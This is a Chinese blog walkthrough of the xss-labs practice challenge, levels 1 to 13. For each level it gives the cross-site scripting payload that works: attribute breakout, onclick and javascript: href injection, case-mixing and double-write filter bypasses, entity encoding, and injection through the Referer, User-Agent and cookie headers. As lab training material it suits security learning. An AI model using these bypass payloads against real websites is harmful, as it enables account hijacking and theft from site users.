xss-labs第1-13关详解

Less-1

image.png
直接将网址中的test改成

<script>alert(1)</script>

image.png

Less-2

image.png
输入后没反应,查看源码后发现是闭合问题
修改为

"><script>alert(1)</script>

image.png

Less-3

image.png
这里看到><被注释掉了
尝试用没有<>的事件试试onclick(onfocus)

'onclick='alert(1)

image.png

Less-4

image.png
和第三关类似,换个闭合方式即可

"onclick="alert(1)

image.png

Less-5

image.png
发现onclick关键字被破坏
image.png
尝试闭合发现情况一样
可以用a标签的href 属性来构造,注意闭合

"><a href=javascript:alert(1)>test</a> 

image.png

Less-6

image.png
发现href关键字被破坏
尝试大小写绕过

"><a hRef=javascript:alert(1)>test</a> 

image.png

Less-7

image.png
过滤了部分,试试双写绕过

"><a hrhrefef=javascrscriptipt:alert(1)>test</a> 

image.png

Less-8

image.png
image.png
双写,大小写均绕过失败
image.png
友情链接里得关键字也被破坏,尝试unicode编码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

image.png

Less-9

image.png
第9关和第8关类似,提示链接不合法
加入**http://**试试
image.png
合法,但不能跳转,把http://闭合掉
image.png

Less-10

image.png
没有对话框,直接在网址中尝试
image.png
查看源码,发现三个type
image.png
给他们三个分别传值试试
image.png
只有t_sort可以上传值,从这里入手,注意闭合

" type='text' onclick='alert(1)'

image.png

Less-11

用第10关的方式发现无法过去
image.png
查看源码发现有ref标签,怀疑是referer
用Burpsuite抓包试试
image.png
对referer进行修改
image.png

" type='text' onclick='alert(1)'

image.png

Less-12

查看源码发现是UA修改
image.png
用Burpsuite进行抓包修改UA
image.png

" type='text' onclick='alert(1)'

image.png

Less-13

查看源码发现是cookie修改
image.png
用Burpsuite进行抓包修改cookie
image.png

" type='text' onclick='alert(1)'

image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值